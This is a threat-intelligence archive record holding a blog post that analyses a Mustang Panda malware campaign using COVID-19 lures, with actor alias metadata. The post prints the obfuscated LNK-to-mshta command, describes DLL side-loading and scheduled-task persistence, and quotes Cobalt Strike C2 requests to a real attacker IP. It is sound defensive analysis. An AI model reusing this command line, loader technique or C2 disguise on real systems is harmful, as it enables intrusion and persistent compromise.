{
	"id": "ba4f3c0a-d150-4e4a-8087-a176f8fc2792",
	"created_at": "2026-04-06T00:14:52.428673Z",
	"updated_at": "2026-04-10T13:11:46.283486Z",
	"deleted_at": null,
	"sha1_hash": "2b606304def5433d1e843fec05d79602d80c9ac1",
	"title": "Mustang Panda joins the COVID-19 bandwagon",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 826759,
	"plain_text": "Mustang Panda joins the COVID-19 bandwagon\r\nPublished: 2020-03-22 · Archived: 2026-04-05 16:20:10 UTC\r\nAt a time when the coronavirus is all over the news, cybercriminals are also taking advantage of the situation. Weeks ago\r\nI stumbled on a Twitter post regarding the Mustang Panda APT group and decided to take a look at it.\r\nTwitter status that started this blog post\r\nSummary\r\nThe attack consists of multiple stages and starts with an LNK file which contains embedded HTML code\r\nwith a script tag carrying VBScript code.\r\nThe LNK file runs a command that executes the embedded code via mshta.exe. Afterwards a decoy document and\r\na dropper are placed and executed on the system.\r\nThe dropper drops three other files into the Public Music folder and persists tencentsoso.exe via the Task Scheduler.\r\nThose files are all loaded into memory in order to execute code which contacts the C2 server to download the final\r\nstage, which is believed to be a Cobalt Strike payload.\r\nStage 1 – LNK Dropper\r\nhttps://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/\r\nPage 1 of 7\n\nBy looking at the properties of the LNK file we can find a malicious command entered into the target property:\r\n# raw\r\n%comspec% /c f%windir:~-3,1%%PUBLIC:~-9,1% %x in (%temp%=%cd%) do f%windir:~-3,1%%PUBLIC:~-9,1% /f \"delims==\" %i\r\n# beautified, pseudocode-like\r\ncmd.exe /c for %x in (%temp%=%cd%)\r\ndo for /f \"delims==\" %i in ('dir %x\\02-21-1.lnk /s /b')\r\ndo start mshta.exe \"%i\"\r\nThe f%windir:~-3,1%%PUBLIC:~-9,1% fragments assemble the keyword for out of single characters taken from environment variables, which is why the beautified form reads as two nested for loops. To simplify this, the command searches for 02-21-1.lnk and executes it via mshta.exe. Mshta.exe[1] is an\r\nexecutable on Windows that can be used to run HTML Applications. In this case it is used to run malicious\r\nVBScript code which is embedded in HTML tags that can be found in the LNK file.\r\nGraphic explaining the LNK stage\r\nThe VBScript code opens a decoy document containing Chinese text, drops a PE executable and runs it. Here is\r\nthe text translated into English:\r\nTaiwanese deputy leader Chen Jianren recently wrote on Facebook that the characteristic of community transmissio\r\nTaiwan's \"Foreign Ministry\" demanded that the United States correct it. Many netizens ridiculed that the authori\r\nStage 2 – PE Dropper\r\nThe dropped file is a PE executable that serves as another dropper and contains a resource named “HELP”.\r\nPicture of Resource Hacker showing the resource\r\nWhen executed, three files from the “HELP” resource are dropped into C:\\Users\\Public\\Music and schtasks.exe is run\r\nin order to achieve persistence on the system.\r\nDisassembly snippet of the execution of schtasks.exe to persist one of the dropped files\r\ntencentsoso.exe is actually a real file from Tencent and at least part of the Tencent SideBar software. The DLL file\r\nhere, however, is custom-made and used to load the nsa binary file. I believe that the attackers are trying to trick\r\nvictims here into believing that this is legitimate software.\r\nStage 3 – Final PE File\r\nOnce tencentsoso.exe is executed, it dynamically loads SideBar.DLL. The DLL then reads the nsa file and\r\ndecrypts it with a simple XOR, allocates memory via VirtualAlloc with executable rights and writes the\r\ndecrypted nsa content into executable memory. Afterwards it jumps to this executable content.\r\nDecrypting nsa and dynamically jumping to the decrypted part\r\nThe sample uses a Cobalt Strike feature known as Malleable C2 and contacts its C2 server 123.51.185.75 to\r\ndownload the next payload.\r\nGET /jquery-3.3.1.slim.min.js HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nHost: code.jquery.com\r\nReferer: http://code.jquery.com/\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko)\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nNote that the Host header claims code.jquery.com while the connection actually goes to 123.51.185.75; this mismatch between Host header and destination IP is the kind of thing worth checking for in proxy logs.\r\nLooking at the response in Wireshark, it becomes clear that the attackers hide the payload in the jQuery code. It\r\nreads the content of the file into a buffer, decrypts the code area and jumps to the offset 0x1008 to start the next\r\nstage.\r\nHTTP Response from C2 Server\r\nStart of decrypted payload in jQuery response\r\nFrom here on the sample keeps sending HTTP requests to the C2 server and waits for commands:\r\nGET /jquery-3.3.1.min.js HTTP/1.1\r\nHost: code.jquery.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nReferer: http://code.jquery.com/\r\nAccept-Encoding: gzip, deflate\r\nCookie: __cfduid=Z_FZubVJKboirizDP2zDYMDszubh4QhllqA5XPSeH2a5qAF0fLAjetJ4gIh5Gsr8WBWkWvD7w0y2zviHFqOhQHKgib9HdE0\r\nUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko)\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nHTTP/1.1 200 OK\r\nDate: Sun, 22 Mar 2020 08:24:59 GMT\r\nServer: NetDNA-cache/2.2\r\nContent-Length: 5543\r\nKeep-Alive: timeout=10, max=100\r\nConnection: keep-alive\r\nContent-Type: application/javascript; charset=utf-8\r\nCache-Control: max-age=0, no-cache\r\nPragma: no-cache\r\nThis final stage is believed to be Cobalt Strike. The Any.Run sandbox also detects it[2].\r\nBy looking at the traffic and doing some research, I found multiple posts that explain the way Cobalt Strike hides\r\npayloads in HTTP responses, the most interesting one being this one[3].\r\nIcons used were made by Pixel perfect from www.flaticon.com\r\nSource: https://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/"
	],
	"report_names": [
		"mustang-panda-joins-the-covid19-bandwagon"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b69037ec-2605-4de4-bb32-a20d780a8406",
			"created_at": "2023-01-06T13:46:38.790766Z",
			"updated_at": "2026-04-10T02:00:03.101635Z",
			"deleted_at": null,
			"main_name": "MUSTANG PANDA",
			"aliases": [
				"Stately Taurus",
				"LuminousMoth",
				"TANTALUM",
				"Twill Typhoon",
				"TEMP.HEX",
				"Earth Preta",
				"Polaris",
				"BRONZE PRESIDENT",
				"HoneyMyte",
				"Red Lich",
				"TA416"
			],
			"source_name": "MISPGALAXY:MUSTANG PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6daadf00-952c-408a-89be-aa490d891743",
			"created_at": "2025-08-07T02:03:24.654882Z",
			"updated_at": "2026-04-10T02:00:03.645565Z",
			"deleted_at": null,
			"main_name": "BRONZE PRESIDENT",
			"aliases": [
				"Earth Preta",
				"HoneyMyte",
				"Mustang Panda",
				"Red Delta",
				"Red Lich",
				"Stately Taurus",
				"TA416",
				"Temp.Hex",
				"Twill Typhoon"
			],
			"source_name": "Secureworks:BRONZE PRESIDENT",
			"tools": [
				"BlueShell",
				"China Chopper",
				"Claimloader",
				"Cobalt Strike",
				"HIUPAN",
				"ORat",
				"PTSOCKET",
				"PUBLOAD",
				"PlugX",
				"RCSession",
				"TONESHELL",
				"TinyNote"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "9baa7519-772a-4862-b412-6f0463691b89",
			"created_at": "2022-10-25T15:50:23.354429Z",
			"updated_at": "2026-04-10T02:00:05.310361Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Mustang Panda",
				"TA416",
				"RedDelta",
				"BRONZE PRESIDENT",
				"STATELY TAURUS",
				"FIREANT",
				"CAMARO DRAGON",
				"EARTH PRETA",
				"HIVE0154",
				"TWILL TYPHOON",
				"TANTALUM",
				"LUMINOUS MOTH",
				"UNC6384",
				"TEMP.Hex",
				"Red Lich"
			],
			"source_name": "MITRE:Mustang Panda",
			"tools": [
				"CANONSTAGER",
				"STATICPLUGIN",
				"ShadowPad",
				"TONESHELL",
				"Cobalt Strike",
				"HIUPAN",
				"Impacket",
				"SplatCloak",
				"PAKLOG",
				"Wevtutil",
				"AdFind",
				"CLAIMLOADER",
				"Mimikatz",
				"PUBLOAD",
				"StarProxy",
				"CorKLOG",
				"RCSession",
				"NBTscan",
				"PoisonIvy",
				"SplatDropper",
				"China Chopper",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ee03999-5432-4a65-a850-c543b4fefc3d",
			"created_at": "2022-10-25T16:07:23.882813Z",
			"updated_at": "2026-04-10T02:00:04.776949Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Bronze President",
				"Camaro Dragon",
				"Earth Preta",
				"G0129",
				"Hive0154",
				"HoneyMyte",
				"Mustang Panda",
				"Operation SMUGX",
				"Operation SmugX",
				"PKPLUG",
				"Red Lich",
				"Stately Taurus",
				"TEMP.Hex",
				"Twill Typhoon"
			],
			"source_name": "ETDA:Mustang Panda",
			"tools": [
				"9002 RAT",
				"AdFind",
				"Agent.dhwf",
				"Agentemis",
				"CHINACHOPPER",
				"China Chopper",
				"Chymine",
				"ClaimLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"DCSync",
				"DOPLUGS",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Farseer",
				"Gen:Trojan.Heur.PT",
				"HOMEUNIX",
				"Hdump",
				"HenBox",
				"HidraQ",
				"Hodur",
				"Homux",
				"HopperTick",
				"Hydraq",
				"Impacket",
				"Kaba",
				"Korplug",
				"LadonGo",
				"MQsTTang",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"NBTscan",
				"NetSess",
				"Netview",
				"Orat",
				"POISONPLUG.SHADOW",
				"PUBLOAD",
				"PVE Find AD Users",
				"PlugX",
				"Poison Ivy",
				"PowerView",
				"QMAGENT",
				"RCSession",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TONEINS",
				"TONESHELL",
				"TVT",
				"TeamViewer",
				"Thoper",
				"TinyNote",
				"WispRider",
				"WmiExec",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"cobeacon",
				"nbtscan",
				"nmap",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434492,
	"ts_updated_at": 1775826706,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2b606304def5433d1e843fec05d79602d80c9ac1.pdf",
		"text": "https://archive.orkl.eu/2b606304def5433d1e843fec05d79602d80c9ac1.txt",
		"img": "https://archive.orkl.eu/2b606304def5433d1e843fec05d79602d80c9ac1.jpg"
	}
}